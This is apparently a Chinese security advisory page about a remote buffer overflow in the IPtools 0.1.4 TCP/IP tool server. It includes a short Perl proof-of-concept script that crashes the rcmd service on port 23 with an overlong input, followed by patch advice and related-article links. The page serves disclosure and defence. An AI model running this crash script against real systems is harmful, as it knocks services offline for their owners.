发布日期:2012-01-06
更新日期:2012-10-16受影响系统:
IPtools IPtools 0.1.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51312IPtools是小型的TCP/IP工具服务器。IPtools 0.1.4及其他版本存在远程缓冲区溢出漏洞,成功利用后可允许远程攻击者在受影响应用中执行任意代码。<*来源:demonalex
链接:http://www.securityfocus.com/archive/1/521142
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#-------------------------------------------------------------
#!/usr/bin/perl -w
#IpTools(0.1.4) - Rcmd Remote Crash PoC by demonalex (at) 163 (dot) com [email concealed]
#-------------------------------------------------------------
use IO::Socket;
$remote_host = "127.0.0.1"; #victim ip as your wish
$remote_port = 23; #rcmd default port number
$sock = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port,
Timeout => 60) || die "$remote_host -> $remote_port is closed!
";
$sock->recv($content, 1000, 0);
$count=0;
while($count<=255){
$sock->send("a", 0);
$count++;
}
$sock->send("
", 0);
$sock->recv($content, 1000, 0);
$sock->shutdown(2);
exit(1);
#-------------------------------------------------------------建议:
--------------------------------------------------------------------------------
厂商补丁:IPtools
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://sourceforge.net/projects/iptools/MangosWeb Enhanced "Login"字段SQL注入漏洞BigPond无线宽带网关命令注入和身份验证绕过漏洞相关资讯 缓冲区溢出漏洞 IPtools安全漏洞
- Novell iPrint Client 缓冲区溢出 (05/04/2013 07:13:08)
- Siemens WinCC CCEServer缓冲区溢 (03/22/2013 19:25:09)
- EMC AlphaStor DCP缓冲区溢出漏洞 (02/05/2013 09:14:34)
| - Siemens WinCC RegReader ActiveX (03/24/2013 08:07:04)
- Novell Messenger / Groupwise (03/18/2013 20:58:20)
- GNU Coreutils ‘sort’Text (02/02/2013 07:27:30)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站